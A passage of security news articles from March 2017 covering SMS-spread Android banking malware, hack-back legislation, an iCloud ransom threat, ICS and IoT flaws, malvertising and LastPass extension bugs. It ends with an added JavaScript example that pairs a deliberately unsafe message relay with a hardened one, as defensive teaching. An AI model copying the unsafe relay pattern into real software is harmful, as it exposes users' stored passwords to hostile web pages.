The Swearing Trojan is similar to other banking trojans: it steals user data and can bypass two-factor authentication (2FA).

It intercepts the one-time code sent to the user via SMS during authentication.

“By replacing the original Android SMS app with an altered version of its own, Swearing Trojan can intercept incoming SMS messages, rendering two-factor authentication useless,” reads the analysis published by Check Point.

Since the Google Play Store is blocked in China, it is easy for scammers to trick users into installing an APK from an untrusted source simply by sending an SMS.

“Using a BTS to send fake messages is quite sophisticated, and the SMS content is very deceptive. The message tricks users into clicking a malicious URL which installs malware,” continues Check Point.

Swearing Trojan also spreads through other phishing lures:

Work related documents: A fake SMS message coming from a manager asks the user to download and open an important document right away, and to reply to comments inside.
Photos or videos: A fake SMS message claims to include a picture of a memorable event, or to be of a cheating spouse.
Trending events: A recent example posed as a MMS message including a video of a cheating celebrity wife caught in action.
App update notifications: An SMS message claims to be from a bank or telecom provider, and asks the user to install critical updates.
This version of the Swearing Trojan does not use command and control servers; the malicious code sends stolen information back to the crooks via SMS or email.

Tencent had reported the arrest of the cybercriminal gang behind the Swearing Trojan; the new wave of attacks leveraging the malware shows that another gang is now using the code.


Proposed Legislation Would Give Legal Right to Hack Back

22.3.2017 Securityweek Hacking
Hacking back is a perennial and contentious issue. Its latest instance comes in the form of a 'Discussion Draft' bill proposed by Representative Tom Graves (R-GA): The Active Cyber Defense Certainty Act. Graves claims it is gaining bipartisan support, and he expects to present it to the House of Representatives for a vote within the next few months.

The Draft Bill (PDF) is an amendment to the Computer Fraud and Abuse Act (CFAA). The CFAA is a deterrent to hacking through potentially severe sanctions; but it has not been effective in preventing cybercrime, and it has made hacking back illegal. The new bill would remove those parts of the CFAA that effectively prevent private business from taking their own action against hackers: "It is a defense to a prosecution under this section that the conduct constituting the offense was an active cyber defense measure."

Noticeably, the bill uses the term 'active cyber defense' throughout, and never once mentions the term 'hacking back'. Active cyber defense is defined by SANS as "The process of analysts monitoring for, responding to, and learning from adversaries internal to the network." It is discussed in detail and expanded in the study titled Into the Grey Zone: The Private Sector and Active Defense against Cyber Threats published by the George Washington University in October 2016.

The George Washington University report warns, "Today, when active defense is discussed, too often the discussion shifts to 'hacking back' -- offensive cyber measures that are beyond the scope of what we define as permissible activity in this report." This has clearly happened with the Graves proposal: it conflates active defense with hacking back.

The proposed Act will provide a CFAA defense when a 'victim' organization responds in a manner "consisting of accessing without authorization the computer of the attacker to the victim's own network to gather information in order to establish attribution of criminal activity to share with law enforcement or to disrupt continued unauthorized activity against the victim's own network."

This is limited by a requirement not to destroy information, not to cause physical injury, and not to create a threat to public health or safety. Nevertheless, it fundamentally gives victim organizations the right to access the attackers' computer without authorization... to disrupt the hackers' action -- and this is hacking back.

Hacking back already happens under limited circumstances. Law enforcement does it, and often uses the expertise of security firms to help.

"To a limited extent," comments security researcher David Harley, "this Act would formalize a cooperative framework that already exists between security companies and law enforcement agencies." This relationship gives law enforcement security expertise and capacity, while offering some legal protection to the security firms.

But, he adds, "I would have to worry about a framework that extended this protection to companies that don't often have that expertise and may be motivated to misuse that protection for competitive advantage... Apart from the ethical issues, I suspect that the quality of those investigations might in many cases be severely compromised."

So, two immediate problems with allowing hacking back are that a lack of expertise could either compromise forensic evidence or accidentally cause actual harm to the attackers' supposed computers. Without adequate expertise, the supposed servers might not even be the attackers' servers. "Because of (compromised) proxies," comments F-Secure's security advisor Sean Sullivan, "hacking back/active defense is complicated and it's quite unlikely that the US Congress would be able to properly define what should be allowed or not."

The Graves proposal makes some attempt at this. It defines the attacker as "a person or an entity that is the source of the persistent unauthorized intrusion into the victim's computer." The use of 'intrusion' would seem to exclude private companies from seeking to take down botnets delivering a DDoS attack, where actual intrusion is rare. But it is not at all clear what 'persistent' would mean in a court of law.

The FBI's official position, for now at least, is that it should not be done. FBI Director James Comey said on March 8 this year, "Don't do it; it's a crime. It's not only against the law but it runs the risk of tremendous confusion in a crowded space." Comey's preference would be for more consistent reporting of cybercrime to the FBI.

The reality, however, is that the right to hack back is a concept that will not go away.

Luis Corrons, technical director at PandaLabs, fears that the whole issue is too complex and context-sensitive for law; and would prefer greater use of common sense. "Having laws that consider each particular case is unviable, and common sense should be applied. Cybercriminals are not going to present charges if you break into their server and make a copy of the key to unencrypt your data. And no Law Enforcement agency should go after you for that if nobody is reporting it. However, that data might be in a compromised server, and the way to get into it could cause problems within it, causing the owner of that server to contact law enforcement for the disruption caused."

In a sense, Corrons' solution is that the authorities should simply turn a blind eye to hacking back that causes zero collateral damage; and that private industry needs to take responsibility for any collateral damage it causes.


Hackers Using Fake Cellphone Towers to Spread Android Banking Trojan
22.3.2017 thehackernews Android

Chinese Hackers have taken Smishing attack to the next level, using rogue cell phone towers to distribute Android banking malware via spoofed SMS messages.
SMiShing, phishing sent via SMS, is an attack in which fraudsters use number spoofing to send convincing bogus messages that trick mobile users into downloading a malware app onto their smartphones or lure them into giving up sensitive information.
Security researchers at Check Point Software Technologies have uncovered that Chinese hackers are using fake base transceiver stations (BTS towers) to distribute "Swearing Trojan," an Android banking malware that once appeared neutralized after its authors were arrested in a police raid.
This is the first ever reported real-world case in which criminals played smart in such a way that they used BTS — a piece of equipment usually installed on cellular telephone towers — to spread malware.
The phishing SMS, which masquerades itself as the one coming from Chinese telecom service providers China Mobile and China Unicom, contains very convincing text with a link to download malicious Android APK.
Since Google Play Store is blocked in China, the SMS easily tricks users into installing the APK from an untrusted source.
"Using a BTS to send fake messages is quite sophisticated, and the SMS content is very deceptive. The message tricks users into clicking a malicious URL which installs malware," the researchers said in the blog post.
Once installed, the Swearing malware distributes itself by sending automated phishing SMSes to a victim's contacts.
Although the range of a BTS antenna may be as little as 10-22 miles, the technique is effective in targeted attacks.
Discovered last year by Tencent Security researchers, the Swearing Trojan has the capability to steal bank credentials and other sensitive information from victim Android devices and to bypass two-factor authentication by replacing a user's legit SMS app with a malicious version that intercepts incoming SMS messages.
What's more interesting? To avoid detection of any malicious activity, the Swearing trojan doesn't connect to any remote command-and-control (C&C) server. Instead, it uses SMS or emails to send stolen data back to the hackers.
"This provides the malware with good cover for its communications and hinders attempts to trace any malicious activity."
While this particular malware campaign has usually targeted Chinese users, Check Point researchers warned in a blog post that the threat could quickly spread worldwide when adopted by Western malware.
The malware scheme seems to be larger than previously thought, as according to researchers, only 21cn.com email addresses were used in the initial malware campaign, while new attacks used other popular Chinese email service providers, such as 163.com, sina.cn, and qq.com, and Alibaba Cloud and other cloud service hosted email accounts as well.
Check Point also points to the HummingBad trojan, which was likewise first discovered in the Chinese mobile market and, in the researchers' words, "turned out to be early birds which continued to spread worldwide" once adopted by Western malware.


Hackers Threaten to Remotely Wipe 300 Million iPhones Unless Apple Pays Ransom
22.3.2017 thehackernews Apple

If you use iCloud to sync your Apple devices, your private data may be at risk of getting exposed or deleted by April 7th.
A group of hackers claiming to have access to over 300 million iCloud accounts is threatening to remotely wipe data from those millions of Apple devices unless Apple pays $75,000 in cryptocurrency or $100,000 worth of iTunes gift cards.
The hacking group, who identified themselves as 'Turkish Crime Family,' has demanded a ransom to be paid in Bitcoin or Ethereum, another popular crypto-currency.
Motherboard broke this story on Tuesday after a hacker claiming to represent the alleged hacking group shared screenshots of alleged emails between the group and Apple's security team with the publication.
"I just want my money and thought this would be an interesting report that a lot of Apple customers would be interested in reading and hearing," the hacker told Motherboard.
The screenshots of email exchange indicate that when Apple security team asked for a sample list of hacked account to verify the claims, the group only provided a YouTube video demonstrating access to one of the allegedly hacked accounts and remotely wiping all content from the device.
However, the story is inconsistent: on its Twitter account the group claims access to 200 million iCloud accounts, in one of the emails it says 300 million Apple email accounts, and in another the number almost doubles to 559 million.
At this time, it is very difficult for even Apple to verify the claims. However, the company has warned the group saying that it does not reward cyber criminals for breaking the law and asking them to remove the video as it was "seeking unwanted attention."
The hacking group has given Apple until April 7 to pay the ransom. Unless its demands are met, the group says it will start remotely wiping victims' Apple devices and resetting iCloud accounts.
How to Protect Your iCloud Account From Hackers
Whether or not the claims and the threat are real, if hackers gain access to your iCloud account they can download all your photos and other private data.
In order to keep your iCloud account safe from hackers, Apple users are advised to change their iCloud passwords immediately and enable two-step authentication to add an extra layer of security to your account.
We are already aware of the consequences of iCloud accounts being hacked by malicious attackers. In 2014, an iCloud hack led to The Fappening, in which hackers flooded the Internet with nude photos of hundreds of female celebrities that had been stored in their iCloud accounts.
Some people are also linking the Turkish Crime Family to the recent The Fappening 2.0 incident that leaked private photographs of many celebrities, including Emma Watson and Mc Rose, last week.
However, there is no evidence to suggest the blackmail attempt had anything to do with The Fappening 2.0 attack.


Citadel Botnet Author Pleads Guilty

22.3.2017 securityweek BotNet
A Russian national has pleaded guilty in a United States court to charges related to the development and distribution of the Citadel malware.

Mark Vartanyan, who has been going by the hacker name of “Kolypto,” was arrested in Norway and extradited to the United States in Dec. 2016. For his role in the development and maintenance of the Citadel malware, he is charged with one count of computer fraud.

Citadel is a well-known information-stealing malware designed with keylogging capabilities as means to steal account credentials for online banking. The malware also recruited infected machines into botnets that were estimated in June 2013 to have been responsible for over half a billion dollars in financial fraud, affecting more than five million people in 90 countries.

Citadel emerged soon after the source code for the Zeus malware leaked online. New variants were observed starting in late 2014, the most recent being Atmos, which was described about a year ago as Citadel's polymorphic successor; that variant had more than 1,000 bots in April last year.

Starting in 2011, Citadel was offered for sale on invite-only, Russian underground forums, and was used to target and exploit the networks of major financial and government institutions, U. S. Attorney John Horn said in a statement. The malware is estimated to have infected around 11 million computers worldwide.

Vartanyan is accused of being actively engaged in the “development, improvement, maintenance and distribution of Citadel” between August 21, 2012 and January 9, 2013, while living in Ukraine, and between April 9, 2014 and June 2, 2014, while living in Norway.

“During these periods, Vartanyan allegedly uploaded numerous electronic files that consisted of Citadel malware, components, updates and patches, as well as customer information, all with the intent of improving Citadel’s illicit functionality,” an announcement from the Department of Justice last week reads.

Vartanyan was charged in a one-count Information with computer fraud, and he is pleading guilty, the plea agreement filed this week by the U.S. Attorney’s Office, Northern District of Georgia, reads (PDF). The hacker faces up to 10 years in prison and a maximum fine of $250,000.

“This defendant’s alleged role in developing and improving “Citadel” for its use by cybercriminals caused a vast amount of financial harm to individuals and institutions around the world. His appearance in federal court today shows that cybercriminals cannot hide in the shadows of the Internet. We will identify them and bring them to justice wherever they operate,” U.S. Attorney Horn said.


Senators Reintroduce Bills to Improve Cybersecurity of Vehicles and Airplanes

22.3.2017 securityweek Cyber
Legislation Would Protect Drivers From Auto Security and Privacy Risks, Implement Cybersecurity Standards for Aircraft

Senators Edward J. Markey (D-Mass.) and Richard Blumenthal (D-Conn.), members of the Commerce, Science and Transportation Committee, reintroduced two pieces of legislation that would implement and improve cybersecurity standards for cars and aircraft.

The Security and Privacy in Your Car (SPY Car) Act directs the National Highway Traffic Safety Administration and the Federal Trade Commission to establish federal standards to secure our cars and protect drivers’ privacy, as well as establishes a rating system – or “cyber dashboard” – that informs consumers about how well the vehicle protects drivers’ security and privacy beyond those minimum standards. In 2014, Senator Markey released the report “Tracking & Hacking: Security & Privacy Gaps Put American Drivers at Risk,” which detailed major gaps in how auto companies are securing connected features in cars against hackers.

The second piece of legislation, the Cybersecurity Standards for Aircraft to Improve Resilience (Cyber AIR) Act, requires the disclosure of information relating to cyberattacks on aircraft systems and establishes standards to identify and address cybersecurity vulnerabilities in the United States commercial aviation system. The bill also calls for a report studying the cybersecurity vulnerabilities of consumer Wi-Fi on planes. In 2015, Senator Markey began an investigation into airline and aircraft manufacturer protections and protocols against the threat of cyberattacks in relation to the integration of new technologies onboard modern aircraft. Last year, Senators Markey and Blumenthal called on the Federal Aviation Administration (FAA) to adopt robust regulations to ensure that aircraft and ground support equipment are not vulnerable to cyberattacks.

“Whether in their cars on the road or in aircraft in the sky, Americans should be protected from cyberattack and violations of their privacy,” said Senator Markey. “If hackers access the critical systems of a car or plane, disaster could ensue and our public safety could be compromised. We must ensure that as technologies change, our safety and privacy is maintained. I thank Senator Blumenthal for his partnership on this critical issue.”

“This critical legislation will help protect the public against cybercriminals who exploit advances in technology like wireless-connected aircraft and self-driving cars,” said Senator Blumenthal. “As technology rapidly advances, we must ensure the auto and airline industries protect their systems from cybersecurity attacks. Security and safety cannot be sacrificed as we achieve the convenience and promise of wireless progress.”


Brain-Inspired System Aims to Improve Threat Detection

22.3.2017 securityweek Security
Cyber Microscope

A new "brain-inspired" computer system promises improved detection of cyber threats by looking for specific patterns that can more efficiently reveal indicators of compromise in a network.

Dubbed the Neuromorphic Cyber Microscope, the system was designed by Lewis Rhodes Labs in partnership with Sandia National Laboratories and aims to address the limitation current systems have when it comes to the detection of more complex indicators of compromise, which the researchers call “new species of ‘bad apples’.”

The designers of the system explain that many modern cybersecurity systems might be looking for general indicators of compromise or only for specific patterns, and often require interaction from security analysts to correctly sort the real dangers from false alarms.

By using its brain-inspired design, the new system promises not only to address this limitation by looking for complex patterns that indicate specific “bad apples,” but also to offer energy consumption savings, as it requires “less electricity than a standard 60-watt light bulb,” its creators claim.

The Microscope’s processor is based on the neuroscience research of Dr. Pamela Follett, a co-founder of Lewis Rhodes Labs. The research was used by her husband, David Follett, co-founder and CEO of Lewis Rhodes Labs, as the basis for a computational model of how the brain processes information.

A team led by computer systems expert John Naegle considered cybersecurity as the domain where the neuromorphic processor would excel.

“We quickly realized that we could use this architecture to greatly accelerate our ability to look for patterns and even look for complex versions of these patterns,” Naegle said.

While conventional detection systems compare the received data against a library of malicious patterns, the Neuromorphic Cyber Microscope was designed to compare streaming data to suspicious patterns in a time-dependent manner, which should improve its detection efficiency.

According to Sandia, it tested the system in a demonstration environment and discovered that it could perform efficiently even when the “bad apple” patterns got more complex, in comparison with a state-of-the-art conventional system that slowed exponentially. Further, the laboratory claims that the Microscope is “more than 100 times faster and 1,000 times more energy-efficient than racks of conventional cybersecurity systems.”

At the moment, however, the Neuromorphic Cyber Microscope is only in the early stages of deployment.

Sandia and Lewis Rhodes Labs are also exploring alternative uses for the general neuromorphic architecture, including a type of machine learning used for audio and image processing and sorting numbers efficiently.


High Severity Flaws Patched in Rockwell Automation Tools

22.3.2017 securityweek Vulnerebility
High severity vulnerabilities have been patched by Rockwell Automation in the company’s Connected Components Workbench and FactoryTalk Activation tools, ICS-CERT said on Wednesday.

One of the flaws, discovered by researcher Ivan Sanchez and tracked as CVE-2017-5176, affects Connected Components Workbench (CCW), a design and configuration application for Rockwell devices. The product is used worldwide in various industries.

According to ICS-CERT, CCW is affected by a DLL hijacking vulnerability that allows a skilled attacker with access to the targeted system to inject malicious code into processes or cause a denial-of-service (DoS) condition.

The flaw affects CCW Developer and Free Standard editions, versions 9.01.00 and earlier. A patch is included in versions 10.00 and 10.01.


The second high severity vulnerability was identified by Rockwell Automation in FactoryTalk Activation, a tool used for activating and managing Rockwell software and activation files. The tool is used by several products, including FactoryTalk, Arena, Emonitor, RSFieldBus, RSLinx, RSLogix, RSNetWorx, RSView32, SoftLogix and Studio 5000.

The security hole, CVE-2017-6015, is related to the improper handling of search paths and it can be exploited by a local user with limited rights to execute arbitrary code with elevated privileges.

The vulnerability affects FactoryTalk Activation 4.00.02 and prior, and it has been addressed with the release of version 4.01.

Rockwell customers that cannot immediately update their software have been provided mitigation instructions for both the CCW and FactoryTalk Activation flaws.


Vulnerabilities in LastPass allowed attackers to steal passwords
22.3.2017 securityaffairs Vulnerebility

The notorious Google Project Zero hacker Tavis Ormandy discovered numerous vulnerabilities in the Chrome and Firefox extensions of the LastPass password manager.
Tavis Ormandy, a security expert at Google Project Zero, discovered several vulnerabilities in the Chrome and Firefox extensions of the LastPass password manager that can be exploited to steal passwords.

The expert also wrote PoC exploits for the flaws and noted that only one of them appears to have been patched by LastPass.

Ormandy first discovered a flaw in the Firefox version of the LastPass extension (version 3.3.2); he did not publicly disclose the details, for obvious reasons. Under Google's disclosure policy, LastPass has 90 days to fix the issue before Project Zero experts disclose the details.


Tavis Ormandy @taviso
Wrote a quick exploit for another LastPass vulnerability. Only affects version on http://addons.mozilla.org (3.3.2), report on way. ¯\_(ツ)_/¯
3:45 AM - 16 Mar 2017
LastPass confirmed that its security team is already working on a fix.

LastPass ✔ @LastPass
We are aware of reports of a Firefox add-on vulnerability. Our security is investigating and working on issuing a fix.
1:17 AM - 22 Mar 2017
Yesterday, Ormandy reported another flaw that affected both the Chrome and Firefox versions of LastPass. The researcher explained that the vulnerability allowed attackers to steal a user’s passwords and, if the binary component was enabled, execute arbitrary code via remote procedure call (RPC) commands.

In order to exploit the flaw, the attacker has to trick victims into visiting a specially crafted web page.

In this case, LastPass promptly issued a temporary fix and shortly afterwards announced that it had fully patched the vulnerability on the server side.

LastPass ✔ @LastPass
The issue reported by Tavis Ormandy has been resolved. We will provide additional details on our blog soon.
2:17 PM - 21 Mar 2017
Ormandy publicly disclosed the details of the flaw including a proof-of-concept (PoC) code. The flaw existed due to the websiteConnector.js content script proxying unauthenticated messages to the extension. An attacker can exploit it to gain access to internal LastPass RPC commands.

“Therefore, this allows complete access to internal privileged LastPass RPC commands. There are hundreds of internal LastPass RPCs, but the obviously bad ones are things copying and filling in passwords (copypass, fillform, etc).” wrote the expert. “If you install the binary component (https://lastpass.com/support.php?cmd=showfaq&id=5576), you can also use “openattach” to run arbitrary code.”

Ormandy also spotted another vulnerability that can be exploited to steal passwords for any domain.

Tavis Ormandy @taviso
I found another bug in LastPass 4.1.35 (unpatched), allows stealing passwords for any domain. Full report will be on the way shortly.


New Metasploit RFTransceiver extension allows testing IoT devices
22.3.2017 securityaffairs Exploit

The Metasploit RFTransceiver extension implements the Hardware Bridge API, which will allow organizations to test wireless devices operating outside the 802.11 spec.
Recently we reported the availability of a new Hardware Bridge extension for Metasploit to test hardware, including IoT devices.

Metasploit RFTransceiver extension

We have to consider that IoT devices are pervading everyday life as well as modern businesses. IoT devices enlarge our attack surface; for this reason, the availability of tools that allow them to be tested rapidly is essential to prevent cyber attacks.

The new Metasploit extension, the Metasploit RFTransceiver radio frequency testing extension, allows researchers to discover security flaws in IoT radio communications.

“Wireless systems often control alarm systems, surveillance monitoring, door access, server room HVAC controls, and many other areas,” writes Craig Smith, Transportation Research Lead at Rapid7, in a blog announcement today. These same devices can often contain flaws that can be used by attackers but are unknown to the user.

Using the RFTransceiver companies will “be able to test physical security controls and better understand when foreign IoT and other devices are brought onto the premises.”

Smith cited as an example the vulnerability in a medical insulin pump discovered in 2016 by researchers at Rapid7.

One of the most disconcerting findings was that the remote control and the pump communicated over an unencrypted channel. An attacker might have exploited the flaw, tracked as CVE-2016-5084, to launch a man-in-the-middle (MitM) attack and intercept patient treatment and device data. The only consolation is that the exposed data did not include any personally identifiable information.

“We strongly believe that RF testing is an incredibly important — though currently often overlooked — component of vulnerability testing. We believe that failing to test the usage of radio frequency in products puts people and organizations at risk.” wrote Smith, “We also believe the importance of RF testing will continue to escalate as the IoT ecosystem further expands.”

Many organizations already use devices operating on radio frequencies outside 802.11, such as RFID readers, components using the Zigbee communication protocol, and surveillance systems.

The RFTransceiver extension is designed to help organizations test them and evaluate their response to outside interference.

The new Metasploit RFTransceiver radio frequency extension could be used for testing purposes, but there is a risk that crooks could abuse its capabilities to find vulnerabilities and exploit them.

The response to the common criticism of any kind of “dual use” technology is that the bad guys are already exploiting it as an attack vector; for this reason, it is important to understand and anticipate the attackers’ moves.

“The most common criticism of any technology created for the purpose of security testing is that bad guys could use it to do bad things. The most common response from the security research community is that the bad guys are already doing bad things, and that it’s only when we understand what they’re doing, can effectively replicate it, and demonstrate the potential impact of attacks, that we can take the necessary steps to stop them. Sunlight is the best disinfectant.”

Experts who want to use the new Metasploit RFTransceiver extension have to buy an RfCat-compatible device like the Yard Stick One and then download the latest RfCat drivers, which include rfcat_msfrelay, the Metasploit Framework relay server for RfCat.

“This is the Metasploit Framework relay server for RfCat. Run this on the system with the RfCat compatible device attached,” Smith concluded. “Then you can connect with the hardware bridge:

To learn more about the RFTransceiver, you can download the latest Metasploit here: https://www.rapid7.com/products/metasploit/download/community/“


Vulnerabilities Found in Popular Solar Park Monitoring System

22.3.2017 securityweek Vulnerebility
Vulnerabilities in solar park monitoring devices

Researchers at IT security services company SEC Consult have discovered several potentially serious vulnerabilities in solar park monitoring systems from Solar-Log. The vendor has released a firmware update to patch the flaws.

Solare Datensysteme’s Solar-Log was recently named the largest vendor for residential and commercial photovoltaic (PV) monitoring. The company says its products have been used to monitor more than 260,000 solar plants worldwide.

An advisory published on Wednesday by SEC Consult shows that the firm has identified a total of seven vulnerabilities. The security holes have been discovered after testing Solar-Log 1200 devices running firmware version 3.5.2-85 and Solar-Log 800e with firmware version 2.8.4-56. Other models are likely also affected considering that they use the same firmware.

SEC Consult told SecurityWeek it has identified tens of thousands of potentially vulnerable devices that can be reached directly from the Internet.

The security holes include an information disclosure flaw that allows an unauthenticated attacker to download a configuration file containing login credentials, and a cross-site request forgery (CSRF) that can be leveraged to modify or remove a device’s password by getting a logged-in user to click on a malicious link.

Another flaw allows an unauthenticated attacker to upload arbitrary files to the Solar-Log system using specially crafted POST requests.

Other vulnerabilities are related to the Beck IPC@CHIP embedded controller used by the Solar-Log monitoring devices. One of these flaws, known since 2001 (CVE-2001-1341), allows an attacker to obtain potentially sensitive information on the network configuration.

Other IPC@CHIP-related bugs can be exploited to change network configurations, cause a denial-of-service (DoS) condition, and reprogram the device’s flash memory. While some of the flaws may exist due to outdated IPC@CHIP software/firmware, SEC Consult pointed out that some attacks are possible because Solar-Log has failed to implement password protection functionality made available by Beck.

The information disclosure, CSRF and arbitrary file upload vulnerabilities can be exploited over the Internet in most cases, while the other weaknesses can be exploited by an attacker with network access to the devices, SEC Consult told SecurityWeek.

The vendor said it addressed the vulnerabilities with the release of firmware version 3.5.3-86, but SEC Consult could not confirm that the flaws have been patched properly.


Malvertising Campaign Targets Adult Websites to Distribute Ramnit Worm

22.3.2017 securityweek  Virus
A new malvertising campaign has been discovered using popular adult websites (each with several million visits per month) to target primarily Canadian and UK visitors. Using pop-under ads, victims were ultimately directed to the RIG exploit kit which sought to drop Ramnit.

Malwarebytes lead malware intelligence analyst Jerome Segura reports that a campaign using the ExoClick ad network sought to infect victims with the Ramnit information-stealing worm.

An earlier Ramnit botnet was dismantled in a joint operation involving security firms and European police agencies in February 2015; but the malware returned before the end of the year. This was followed by a quiet period until a new version, possibly with a new master, emerged in the summer of 2016.

Pop-under ads are triggered when a user clicks on an item on the site they are visiting. Doing so in this instance launched a pop-under window behind the main page. Redirection from here loaded mostly benign adult portals and offers -- but a 302 redirect also went to a malicious site that performed geolocation fingerprinting before loading the RIG exploit kit.

The danger with malvertising is that it is invisible to the eye and effective from trusted sites. One method of mitigating this threat is to use an ad blocker which prevents all third-party ads, both benign and malicious, from being loaded. Publishers, however, are increasingly detecting such software and not allowing visitors to see the content. This is, strictly speaking, illegal within the European Union, but still happens.

A second defense is to rely on an up-to-date mainstream anti-virus product and hope that it detects the malvertising payload. Segura recommends both. "Ad-blockers are quite effective as a first line of defense to stop malvertising in general," he told SecurityWeek, "while security products will mitigate exploits and malware payload. One solution should not replace the other and they actually complement each other nicely."

Ramnit has evolved into effective banking fraud malware. The geolocation used in this campaign seeks to target Canada and the UK -- two areas that have been repeatedly targeted by Ramnit. "The creators of the Ramnit Trojan (or any banking Trojan for that matter)," explains Segura, "need to have an understanding of each country's financial institutions in order to develop the appropriate tools (webinjects) to capture user information who do online banking. The choice could be motivated simply by the return on investment, likelihood of being detected but also general availability of money mules to transfer funds." Canadian and UK banks are clearly well-understood by the criminals behind the malware.

In this campaign (which has now been blocked by ExoClick), the prime target is individual adults. It would be wrong, however, to assume that malvertising is primarily a consumer threat. Relaxed attitudes to staff using their own devices at work and using the internet to keep up with news makes everyone susceptible.

"Malvertising isn't just a consumer threat in the sense that any user today is exposed to rogue online adverts, whether it is at home or at work," warns Segura. "Online crooks abuse ad networks to insert malicious redirections into their creative effectively making malvertising a precise and targeted delivery mechanism for malware. Therefore, consumers may be served a different payload than businesses while the distribution via malicious ads remains the same."


Multiple Vulnerabilities Uncovered in Google Nest Cam

22.3.2017 securityweek Vulnerebility  
A security researcher took to GitHub to disclose information on multiple vulnerabilities allegedly affecting Nest Cam and Dropcam Pro devices after receiving no response from Google for several months.

The issues were discovered by security researcher Jason Doyle and affect the devices’ Bluetooth connectivity, allowing an attacker to access the affected device remotely or knock it offline for 60 to 90 seconds. Basically, a burglar capable of shutting the camera down could slip past it unnoticed.

Doyle revealed that three vulnerabilities impact the Bluetooth (BLE) connectivity of Dropcam, Dropcam Pro, and Nest Cam Indoor/Outdoor models running firmware version 5.2.1. The researcher says that Google, which bought Nest several years ago, was notified of the issues on October 26, 2016. The company even acknowledged the bugs, but hasn’t released a fix to date.

The first bug is a buffer overflow condition that can be triggered when setting the SSID parameter on the camera. According to the researcher, an attacker exploiting the issue would have to be within Bluetooth range at any time during the camera’s powered on state. This is possible, however, because Bluetooth on the device is never disabled, not even after initial setup.

Another buffer overflow condition can be triggered when setting the encrypted password parameter on the camera. Similarly, the attacker must be in Bluetooth range of the device. The attack causes the camera to crash and reboot back to an operational state.

The third issue, the researcher reveals, could allow an attacker to temporarily disconnect the camera from its Wi-Fi connection by supplying it with a new SSID to connect to. Because the affected cameras don’t come with support for local storage of video footage, the surveillance capabilities of the targeted device are temporarily disabled.

This attack can be leveraged to knock the camera offline while it attempts association with the newly set SSID. The device goes offline for around 60-90 seconds before re-connecting to the original Wi-Fi network and resuming normal operation.

The security researcher published all of the details pertaining to the three vulnerabilities, complete with example exploits.


LastPass Flaws Allow Hackers to Steal Passwords

22.3.2017 securityweek Hacking

Critical vulnerabilities found in the Chrome and Firefox extensions of the LastPass password manager can be exploited to steal passwords, warned Google Project Zero researcher Tavis Ormandy.

The expert has discovered several flaws, but only one of them appears to have been patched by LastPass developers.

Ormandy first reported finding a vulnerability in the Firefox version of the LastPass extension (version 3.3.2). The details of the security hole have not been made public. LastPass, which has 90 days to release a fix before details are disclosed by Project Zero, says it’s aware of the flaw and its security team is working on a patch.

LastPass ✔ @LastPass
We are aware of reports of a Firefox add-on vulnerability. Our security is investigating and working on issuing a fix.
1:17 AM - 22 Mar 2017

On Tuesday, the Project Zero researcher reported finding another vulnerability that affected both the Chrome and Firefox versions of LastPass. The weakness allowed a hacker to steal a user’s passwords and, if the binary component was enabled, execute arbitrary code via remote procedure call (RPC) commands. The attack could have been carried out by getting the targeted user to access a specially crafted web page.

LastPass implemented a temporary mitigation within hours after learning of the flaw’s existence, and claimed to have fully patched the issue on the server side soon after. Users are not required to take any action.

Ormandy has made public the details of this vulnerability, including proof-of-concept (PoC) code, and LastPass has promised to publish a blog post of its own to provide more information.

According to Ormandy, the flaw existed due to the websiteConnector.js content script proxying unauthenticated messages to the extension, giving an attacker complete access to internal LastPass RPC commands (e.g. for copying or filling in passwords).

Shortly after LastPass announced the fix, the expert said on Twitter that he identified another vulnerability that can be exploited to steal passwords for any domain.

This is not the only web browser extension analyzed by Ormandy. The expert previously reported finding flaws in Cisco WebEx, AVG Web TuneUp, and an extension installed silently by Adobe with Acrobat and Reader updates.
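The root cause given in both LastPass write-ups above is a content script (websiteConnector.js) that proxied unauthenticated page messages straight to the extension's privileged RPC layer. The following is an added example, written for this page rather than taken from LastPass or from Ormandy's PoC, with every name hypothetical: a simulated content-script relay in its unsafe form (forwards any message) next to a hardened form that checks the sender origin, the message shape and an allowlist of page-callable commands. The message events and the trusted origin are constructed placeholders.

```javascript
// Added example (hypothetical names; not LastPass's extension code or
// Ormandy's PoC). A content script relays window.postMessage events to the
// extension's privileged RPC layer. The first relay reproduces the flaw
// described above: it forwards every message unchanged. The second one
// checks origin, message shape and an allowlist of page-callable commands.

// Hypothetical privileged RPC backend, standing in for the extension's
// background page. It records which commands ran so results can be checked.
function makeBackground() {
  const executed = [];
  return {
    executed,
    // Simulates the runtime port: whatever arrives is dispatched as an RPC.
    postMessage(msg) {
      executed.push(msg && msg.cmd);
    },
  };
}

// Unsafe relay: proxies every page message to the extension as-is, so a
// page can name any internal RPC (the article cites copypass and fillform).
function unsafeRelay(event, port) {
  port.postMessage(event.data);
  return { forwarded: true, reason: null };
}

// Commands a web page is allowed to request through the relay (hypothetical).
const PAGE_ALLOWED_COMMANDS = new Set(['ping', 'getExtensionVersion']);

// Hardened relay: forward only well-formed messages from an expected origin
// that request an allowlisted command, and rebuild the message so that
// unexpected fields never reach the RPC layer.
function hardenedRelay(event, port, allowedOrigins) {
  if (!allowedOrigins.has(event.origin)) {
    return { forwarded: false, reason: 'untrusted origin' };
  }
  const msg = event.data;
  if (msg === null || typeof msg !== 'object' || typeof msg.cmd !== 'string') {
    return { forwarded: false, reason: 'malformed message' };
  }
  if (!PAGE_ALLOWED_COMMANDS.has(msg.cmd)) {
    return { forwarded: false, reason: 'command not allowed: ' + msg.cmd };
  }
  const args = Array.isArray(msg.args) ? msg.args.map(String) : [];
  port.postMessage({ cmd: msg.cmd, args });
  return { forwarded: true, reason: null };
}

// Constructed postMessage events standing in for a crafted page and a
// trusted page; both origins are placeholders.
const TRUSTED_ORIGINS = new Set(['https://trusted.example']);
const craftedPageEvent = {
  origin: 'https://crafted.example',
  data: { cmd: 'copypass', args: ['bank.example'] },
};
const trustedPageEvent = {
  origin: 'https://trusted.example',
  data: { cmd: 'ping', args: [] },
};

// Run both relays and return what each simulated backend actually executed.
function demo() {
  const unsafe = makeBackground();
  unsafeRelay(craftedPageEvent, unsafe);

  const hardened = makeBackground();
  const dropped = hardenedRelay(craftedPageEvent, hardened, TRUSTED_ORIGINS);
  const kept = hardenedRelay(trustedPageEvent, hardened, TRUSTED_ORIGINS);

  return {
    unsafeExecuted: unsafe.executed,     // ['copypass']
    hardenedExecuted: hardened.executed, // ['ping']
    dropped,
    kept,
  };
}

console.log(JSON.stringify(demo(), null, 2));
```

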